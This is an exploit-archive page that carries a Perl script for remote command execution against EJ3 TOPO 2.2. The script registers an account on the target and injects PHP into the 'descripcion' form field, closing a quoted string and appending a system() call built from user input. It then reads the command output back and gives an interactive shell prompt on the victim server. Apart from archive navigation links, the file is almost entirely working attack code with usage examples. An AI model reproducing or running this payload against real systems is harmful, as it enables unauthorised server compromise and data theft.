ej3-exec.txt

ej3-exec.txt: Posted Jul 12, 2006; Authored by Hessam-x; EJ3 TOPO version 2.2 remote command execution exploit.; tags | exploit, remote; SHA-256 | ac44a1b4d3443dae78da19d6cae880fa7ee1eb9a1d5bd2ab49dcd22d31a2ebc6; Download | Favorite | View

ej3-exec.txt

#!/usr/bin/perl
#
# EJ3 TOPO  2.2 Remote Code Execution Exploit
# --------------------------------------------- 
# Note : This Exploit Just run TOPO 2.2
# IHST : www.Hackerz.Ir 
# AST  : www.aria-security.net
###### (C)oded & Discovered By Hessam-x

use LWP::UserAgent;
use LWP::Simple;
use HTTP::Cookies;


 $host = $ARGV[0];

 $url = "http://".$host;

&hed;
    print " [~] Host : $host \n";
    print " [~] Conecting ...\n";


 $xpl = LWP::UserAgent->new() or die;
 $cookie_jar = HTTP::Cookies->new();
 $xpl->cookie_jar( $cookie_jar );
 
 $res = $xpl->post($url.'index.php',
 Content => [
 "email"   => "info@yahoo.com",
 "web"   => "Yahoo.Com",
 "webURL"   => "http://www.yahoo.com",
 "BannerURL"   => "http://www.yahoo.com/logo.jpg",
 "descripcion" => "YAHOO!INC",
 "country" => "as",
 "m" => "members",
 "s" => "html",
 "t" => "join",
 "paso" => "2",
 "ID" => "shell",
 ],);

 print " [+] Created a user ...\n";
 &run;
 

 
 sub hed()
{
 print q(
 ###########################################################
 #        EJ3 TOPO <= 2.1 Remote Code Execution Exploit    #
 #                                                         #
 ############# Coded & discovered By Hessam-x ##############

);

 
 if (@ARGV < 1) {
 print " #  usage : hx.pl [host&path]\n"; 
 print " #  E.g : hx.pl www.milw0rm.com/toplist/\n"; 
  exit();
 }
 
} 
 
    while ()
{
    &run
    }
  sub run()
 {  

      print "\n[Shell]\$";
      chomp($exc=<STDIN>);
    
        exit() if ($exc eq 'exit');

 
 
  $commd = "system(\"$exc\")";
  $cmd  = 'echo 1 ; echo _START_ ; '.$commd.' ; echo _END_';


 $req = $xpl->post($url.'index.php',
 Content => [
 "passwordNEW" => "0",
 "email"   => "info@yahoo.com",
 "webURL"   => "http://www.yahoo.com",
 "BannerURL"   => "http://www.yahoo.com/logo.jpg",
 "descripcion" => "YAHOO!INC' ;  $cmd ; ?>//",
 "country" => "unknow",
 "m" => "members",
 "s" => "html",
 "t" => "edit",
 "paso" => "2",
 "password" => "0",
 "ID" => "shell",
 ],);
 $res = $xpl->get($url.'index.php?m=top&s=out&ID=shell');
 @result = split(/\n/,$res->content);
 $runned = 0;
 $on = 0;
 print "\n";
 for $res(@result)
  {
    if ($res =~ /^_END_/) { print "\n"; return 0; }
    if ($on == 0) { print "  $res\n"; }
    if ($res =~ /^_START_/) { $on = 1; $runned = 1; } 
  }
    if (!$runned) { print "Can not execute command . EXPLOIT FAILED !\n" ; };
   
  
  
  }

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 87 files
Gentoo 31 files
Debian 21 files
tmrswrr 10 files
Sina Kheirkhah 7 files
Rodolfo Tavares 4 files
bRpsd 4 files
Google Security Research 3 files
Jann Horn 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,350)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,266)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,658)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

ej3-exec.txt

ej3-exec.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ej3-exec.txt

Share This

ej3-exec.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems